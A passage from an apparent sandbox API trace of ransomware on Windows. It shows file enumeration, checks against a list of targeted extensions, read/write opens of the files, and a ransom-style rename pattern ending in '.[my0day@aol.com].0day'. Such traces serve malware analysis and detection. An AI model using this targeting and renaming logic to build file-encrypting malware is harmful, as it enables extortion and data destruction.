[0266.479] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".bz2") returned 4 [0266.479] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".7z") returned 3 [0266.479] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".dbf") returned 4 [0266.479] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".1cd") returned 4 [0266.479] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".jpg") returned 4 [0266.479] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.480] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.480] lstrlenW (lpString="keypadbase.xml") returned 14 [0266.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.687] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=1118) returned 1 [0266.687] CloseHandle (hObject=0x2f0) returned 1 [0266.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0266.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString=".doc") returned 4 [0266.688] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString=".docx") returned 5 [0266.688] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.688] lstrlenW (lpString=".pdf") returned 4 [0266.688] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString=".xls") returned 4 [0266.688] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString=".xlsx") returned 5 [0266.688] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.688] lstrlenW (lpString=".ppt") returned 4 [0266.688] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString=".zip") returned 4 [0266.688] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.688] lstrlenW (lpString=".rar") returned 4 [0266.688] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString=".bz2") returned 4 [0266.688] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString=".7z") returned 3 [0266.688] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString=".dbf") returned 4 [0266.688] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString=".1cd") returned 4 [0266.688] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.688] lstrlenW (lpString=".jpg") returned 4 [0266.688] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.689] lstrlenW (lpString=".doc") returned 4 [0266.689] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString=".docx") returned 5 [0266.689] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.689] lstrlenW (lpString=".pdf") returned 4 [0266.689] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString=".xls") returned 4 [0266.689] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString=".xlsx") returned 5 [0266.689] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.689] lstrlenW (lpString=".ppt") returned 4 [0266.689] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.689] lstrlenW (lpString=".zip") returned 4 [0266.689] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.689] lstrlenW (lpString=".rar") returned 4 [0266.689] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString=".bz2") returned 4 [0266.689] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString=".7z") returned 3 [0266.689] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.689] lstrlenW (lpString=".dbf") returned 4 [0266.689] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.690] lstrlenW (lpString=".1cd") returned 4 [0266.690] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0266.690] lstrlenW (lpString=".jpg") returned 4 [0266.690] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.690] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.690] lstrlenW (lpString="base.xml") returned 8 [0266.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.691] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3150) returned 1 [0266.691] CloseHandle (hObject=0x2f0) returned 1 [0266.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0x20 [0266.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString=".doc") returned 4 [0266.692] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString=".docx") returned 5 [0266.692] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.692] lstrlenW (lpString=".pdf") returned 4 [0266.692] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString=".xls") returned 4 [0266.692] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString=".xlsx") returned 5 [0266.692] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.692] lstrlenW (lpString=".ppt") returned 4 [0266.692] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString=".zip") returned 4 [0266.692] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.692] lstrlenW (lpString=".rar") returned 4 [0266.692] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString=".bz2") returned 4 [0266.692] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString=".7z") returned 3 [0266.692] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString=".dbf") returned 4 [0266.692] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString=".1cd") returned 4 [0266.692] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.692] lstrlenW (lpString=".jpg") returned 4 [0266.692] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.693] lstrlenW (lpString=".doc") returned 4 [0266.693] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString=".docx") returned 5 [0266.693] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.693] lstrlenW (lpString=".pdf") returned 4 [0266.693] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString=".xls") returned 4 [0266.693] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString=".xlsx") returned 5 [0266.693] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.693] lstrlenW (lpString=".ppt") returned 4 [0266.693] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.693] lstrlenW (lpString=".zip") returned 4 [0266.693] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.693] lstrlenW (lpString=".rar") returned 4 [0266.693] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString=".bz2") returned 4 [0266.693] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString=".7z") returned 3 [0266.693] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.693] lstrlenW (lpString=".dbf") returned 4 [0266.693] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.693] lstrlenW (lpString=".1cd") returned 4 [0266.694] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0266.694] lstrlenW (lpString=".jpg") returned 4 [0266.694] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.694] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.694] lstrlenW (lpString="baseAltGr_rtl.xml") returned 17 [0266.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.694] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=247) returned 1 [0266.694] CloseHandle (hObject=0x2f0) returned 1 [0266.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0266.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.694] lstrlenW (lpString=".doc") returned 4 [0266.694] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.694] lstrlenW (lpString=".docx") returned 5 [0266.694] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0266.694] lstrlenW (lpString=".pdf") returned 4 [0266.694] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.694] lstrlenW (lpString=".xls") returned 4 [0266.694] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.694] lstrlenW (lpString=".xlsx") returned 5 [0266.695] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0266.695] lstrlenW (lpString=".ppt") returned 4 [0266.695] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString=".zip") returned 4 [0266.695] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.695] lstrlenW (lpString=".rar") returned 4 [0266.695] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString=".bz2") returned 4 [0266.695] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString=".7z") returned 3 [0266.695] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString=".dbf") returned 4 [0266.695] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString=".1cd") returned 4 [0266.695] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString=".jpg") returned 4 [0266.695] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.695] lstrlenW (lpString=".doc") returned 4 [0266.695] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString=".docx") returned 5 [0266.695] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0266.695] lstrlenW (lpString=".pdf") returned 4 [0266.695] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString=".xls") returned 4 [0266.695] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.695] lstrlenW (lpString=".xlsx") returned 5 [0266.695] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0266.695] lstrlenW (lpString=".ppt") returned 4 [0266.696] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.696] lstrlenW (lpString=".zip") returned 4 [0266.696] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.696] lstrlenW (lpString=".rar") returned 4 [0266.696] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.696] lstrlenW (lpString=".bz2") returned 4 [0266.696] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.696] lstrlenW (lpString=".7z") returned 3 [0266.696] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.696] lstrlenW (lpString=".dbf") returned 4 [0266.696] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.696] lstrlenW (lpString=".1cd") returned 4 [0266.696] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0266.696] lstrlenW (lpString=".jpg") returned 4 [0266.696] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.697] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.697] lstrlenW (lpString="base_altgr.xml") returned 14 [0266.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.697] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3161) returned 1 [0266.698] CloseHandle (hObject=0x2f0) returned 1 [0266.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0266.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.698] lstrlenW (lpString=".doc") returned 4 [0266.698] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString=".docx") returned 5 [0266.698] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0266.698] lstrlenW (lpString=".pdf") returned 4 [0266.698] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString=".xls") returned 4 [0266.698] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString=".xlsx") returned 5 [0266.698] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0266.698] lstrlenW (lpString=".ppt") returned 4 [0266.698] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.698] lstrlenW (lpString=".zip") returned 4 [0266.698] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.698] lstrlenW (lpString=".rar") returned 4 [0266.698] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString=".bz2") returned 4 [0266.698] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString=".7z") returned 3 [0266.698] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.698] lstrlenW (lpString=".dbf") returned 4 [0266.698] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.699] lstrlenW (lpString=".1cd") returned 4 [0266.699] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.699] lstrlenW (lpString=".jpg") returned 4 [0266.699] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.699] lstrlenW (lpString=".doc") returned 4 [0266.699] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString=".docx") returned 5 [0266.699] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0266.699] lstrlenW (lpString=".pdf") returned 4 [0266.699] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString=".xls") returned 4 [0266.699] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString=".xlsx") returned 5 [0266.699] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0266.699] lstrlenW (lpString=".ppt") returned 4 [0266.699] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.699] lstrlenW (lpString=".zip") returned 4 [0266.699] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.699] lstrlenW (lpString=".rar") returned 4 [0266.699] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString=".bz2") returned 4 [0266.699] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.699] lstrlenW (lpString=".7z") returned 3 [0266.699] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.700] lstrlenW (lpString=".dbf") returned 4 [0266.700] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.700] lstrlenW (lpString=".1cd") returned 4 [0266.700] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0266.700] lstrlenW (lpString=".jpg") returned 4 [0266.700] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.700] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.700] lstrlenW (lpString="base_ca.xml") returned 11 [0266.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.700] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3166) returned 1 [0266.700] CloseHandle (hObject=0x2f0) returned 1 [0266.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: 